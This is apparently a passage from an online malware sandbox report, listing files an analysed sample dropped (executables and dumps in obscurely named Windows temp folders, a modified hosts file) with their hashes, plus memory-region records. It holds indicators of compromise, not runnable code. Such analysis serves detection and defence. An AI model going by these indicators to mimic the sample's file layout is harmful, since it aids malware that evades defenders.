
                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                      • C:\Windows\SysWOW64\wpcap.dll

                                        Filesize

                                        275KB

                                        MD5

                                        4633b298d57014627831ccac89a2c50b

                                        SHA1

                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                        SHA256

                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                        SHA512

                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                      • C:\Windows\TEMP\tckjwhyci\config.json

                                        Filesize

                                        693B

                                        MD5

                                        f2d396833af4aea7b9afde89593ca56e

                                        SHA1

                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                        SHA256

                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                        SHA512

                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                      • C:\Windows\TEMP\ypbgnfgfn\1124.dmp

                                        Filesize

                                        1.3MB

                                        MD5

                                        93552c6c837a49b271e74ade66458721

                                        SHA1

                                        3424e1c6b4527dd45d19bbc1e42aa9c469dd3b14

                                        SHA256

                                        5d75b89665165019e5b62aa1cc94763dcacb146d26bd0fc8aaf7d4f37000a2a0

                                        SHA512

                                        79600267e0bd5f6b7ca5f27aa2a2971bd2f02db058d494a562038feae4defc3a4a64ab6a48055ca37f52a5671faaa309ad2956998a46e1f78a771a6c16868319

                                      • C:\Windows\TEMP\ypbgnfgfn\1180.dmp

                                        Filesize

                                        1.3MB

                                        MD5

                                        47829f26c17a18e1c21490e1df2be364

                                        SHA1

                                        f3e7279f5272fcba4ac2561633d321f0dc2604a5

                                        SHA256

                                        ba955dc369da9673e5c753e383a18b10036ad18516146d2ca5fa204fc13afe3f

                                        SHA512

                                        91794cccb9270f2372a43aa1b824ea438547a4838c888127ff2dac69e9bd6b10cdf9de0bfe83342bef95530cadbf25e83804ae628a3b204340317c3139423abf

                                      • C:\Windows\TEMP\ypbgnfgfn\1312.dmp

                                        Filesize

                                        4.5MB

                                        MD5

                                        36ed47223ed8a9634b0ac7359433fa00

                                        SHA1

                                        30614d6ce8b1de7f589b2eb5f62c275c161b4486

                                        SHA256

                                        84a363dc0ca1fa066bcccd85e03260580b50e42d6edd2c9a0b55ce5dfdb4fd79

                                        SHA512

                                        eed3786ce17a5a4c8f174b4f489327e51ec1ba1e622bf1db1a07a59119221a21fab266fb4306b884ddb67a14d1859e4a4236af8fbf25565bcd3cdac258407855

                                      • C:\Windows\TEMP\ypbgnfgfn\1560.dmp

                                        Filesize

                                        2.2MB

                                        MD5

                                        637a2bd1fa9c078d3e8dfbd2c3de305b

                                        SHA1

                                        d165dfb09d5ad553c45b2c3f4d6ef26af3ff8d0c

                                        SHA256

                                        754b39394d9ad94a2b89677b41fcfa1352ba195cf4c1bda6425a68986b8198a6

                                        SHA512

                                        72a149137f23f38b343e6165c1a801a43ae8edbe97e275d528bdfb41abede87271866825f7f4d0bbc8df04a8351494c97c7f9dfb38d570fd3fe9319e626ac032

                                      • C:\Windows\TEMP\ypbgnfgfn\1584.dmp

                                        Filesize

                                        5.3MB

                                        MD5

                                        8cb8357c13329513488ef4dc85367dfb

                                        SHA1

                                        5c112c4201839dd2f103f8356afe6b4b9af5e6bc

                                        SHA256

                                        a9fdc86e7137658b860f00a11b02fe6e9fb7cec096f47f38a5e0e5e7d6ec7d75

                                        SHA512

                                        2d9e7916bcc5c2f7d8f2a76191f287d3823ad8b741836c9cce151e5ea56bf01a1f3640f8cc07f9933f532a06136626a93e750d2900520b53478006e722d32720

                                      • C:\Windows\TEMP\ypbgnfgfn\2680.dmp

                                        Filesize

                                        6.8MB

                                        MD5

                                        5386c24ed854e2b845bb0bf45cbd2d93

                                        SHA1

                                        25734ddfdcc2e1a74702707fa988eed6c14a5e0d

                                        SHA256

                                        0f4cb0f0b99815b6dde94cd6227853ec7a45287542e5c4f1b356c7622c21906b

                                        SHA512

                                        cf2ee2d67bee445810ae2f9833cb2ded9b212c6ab0b5610d8c2e992ca8e1a6b7bde3927ba9cb7beea1878b19084eebdb4c9c748c1cd809272555ed55882e6051

                                      • C:\Windows\TEMP\ypbgnfgfn\2692.dmp

                                        Filesize

                                        843KB

                                        MD5

                                        c4e2d4967b5070b751a18fb24372d648

                                        SHA1

                                        016613da2e7bead2dc751d5898ea01fc68ffeca7

                                        SHA256

                                        83829f5bdfc08f15294bb83f5eff23bb7830f1cdabf93ec551391066ffc9af1a

                                        SHA512

                                        6c05b347a66e9f790dae60756ebf5df6ff417d03398e3de548856e22e926b442ca833eed0af8b29c5a325a15cdf03e6408a42bcc5f79da4b43a089b29e0965b2

                                      • C:\Windows\TEMP\ypbgnfgfn\768.dmp

                                        Filesize

                                        4.6MB

                                        MD5

                                        21075c9af7a85c30fe1183e4703405e2

                                        SHA1

                                        c0556d8cca3c765a6a26351f63377d2ce38f7e29

                                        SHA256

                                        d8d65c230716e0a39b0cb18ceaa25dea79d8dcc186bd87160c09743dedc2e956

                                        SHA512

                                        2e8a4c25b2ecf4eba5acc51c550e986cf2cab68156cdf75af98d05f5eaa860806628c585bf508d0be25830d6cfb72abe72ef81d547c4b1396153302ee95217c1

                                      • C:\Windows\Temp\xohudmc.exe

                                        Filesize

                                        72KB

                                        MD5

                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                        SHA1

                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                        SHA256

                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                        SHA512

                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                      • C:\Windows\system32\drivers\etc\hosts

                                        Filesize

                                        975B

                                        MD5

                                        b5d815ff5310f62de5020591be598bc0

                                        SHA1

                                        8013562b0cc2516d16d474308c8982a31b7f5dd0

                                        SHA256

                                        a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                        SHA512

                                        4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                      • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe

                                        Filesize

                                        332KB

                                        MD5

                                        ea774c81fe7b5d9708caa278cf3f3c68

                                        SHA1

                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                        SHA256

                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                        SHA512

                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                      • \Windows\Temp\nsj5F03.tmp\System.dll

                                        Filesize

                                        11KB

                                        MD5

                                        2ae993a2ffec0c137eb51c8832691bcb

                                        SHA1

                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                        SHA256

                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                        SHA512

                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                      • \Windows\Temp\nsj5F03.tmp\nsExec.dll

                                        Filesize

                                        6KB

                                        MD5

                                        b648c78981c02c434d6a04d4422a6198

                                        SHA1

                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                        SHA256

                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                        SHA512

                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                      • \Windows\Temp\tckjwhyci\aktvci.exe

                                        Filesize

                                        343KB

                                        MD5

                                        2b4ac7b362261cb3f6f9583751708064

                                        SHA1

                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                        SHA256

                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                        SHA512

                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                      • \Windows\Temp\ypbgnfgfn\ctjtihzei.exe

                                        Filesize

                                        126KB

                                        MD5

                                        e8d45731654929413d79b3818d6a5011

                                        SHA1

                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                        SHA256

                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                        SHA512

                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                      • \Windows\rtldfmcc\nihkvnz.exe

                                        Filesize

                                        7.6MB

                                        MD5

                                        c14a2c82c4467668628efecf53596e3c

                                        SHA1

                                        ab77beb9cf21b8a804883ac2afd611ca49fdbdcd

                                        SHA256

                                        47ec71f60997578a4eb4fa15338e6411699a6bc68feb428e3861da2063d8f74d

                                        SHA512

                                        369cc4056de86047ad7a9957a7c719d8bcb710f6d0ee3b92fda5be651fbd1e664f1005b8f5209aefb02e75962a163fabe66275015349f9a2e5db0b28ad1c25ce

                                      • \Windows\ypbgnfgfn\Corporate\vfshost.exe

                                        Filesize

                                        381KB

                                        MD5

                                        fd5efccde59e94eec8bb2735aa577b2b

                                        SHA1

                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                        SHA256

                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                        SHA512

                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                      • \Windows\ypbgnfgfn\livcfcfiu\wpcap.exe

                                        Filesize

                                        424KB

                                        MD5

                                        e9c001647c67e12666f27f9984778ad6

                                        SHA1

                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                        SHA256

                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                        SHA512

                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                      • memory/284-233-0x000000013FF10000-0x000000013FF6B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/572-144-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/572-154-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/940-134-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/940-135-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1564-219-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/1616-138-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1616-136-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                      • memory/1716-189-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-151-0x0000000000110000-0x0000000000120000-memory.dmp

                                        Filesize

                                        64KB

                                      • memory/1716-149-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-217-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-241-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-235-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-242-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1716-190-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/1856-210-0x000000013FEB0000-0x000000013FF0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/1856-208-0x000000013FEB0000-0x000000013FF0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2000-226-0x000000013F240000-0x000000013F29B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2000-224-0x000000013F240000-0x000000013F29B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2228-75-0x0000000000130000-0x000000000017C000-memory.dmp

                                        Filesize

                                        304KB

                                      • memory/2488-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                      • memory/2488-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                      • memory/2612-183-0x0000000000400000-0x0000000000412000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/2612-169-0x0000000010000000-0x0000000010008000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2776-198-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-194-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-236-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-142-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-216-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-214-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-180-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-187-0x0000000002B50000-0x0000000002C70000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/2776-206-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-158-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2776-147-0x0000000002B50000-0x0000000002C70000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/2776-230-0x0000000002560000-0x00000000025BB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2820-202-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2820-199-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2876-188-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2876-192-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2912-160-0x000000013F080000-0x000000013F0DB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/2912-181-0x000000013F080000-0x000000013F0DB000-memory.dmp

                                        Filesize

                                        364KB

                                      • memory/3036-9-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                      We care about your privacy.

                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.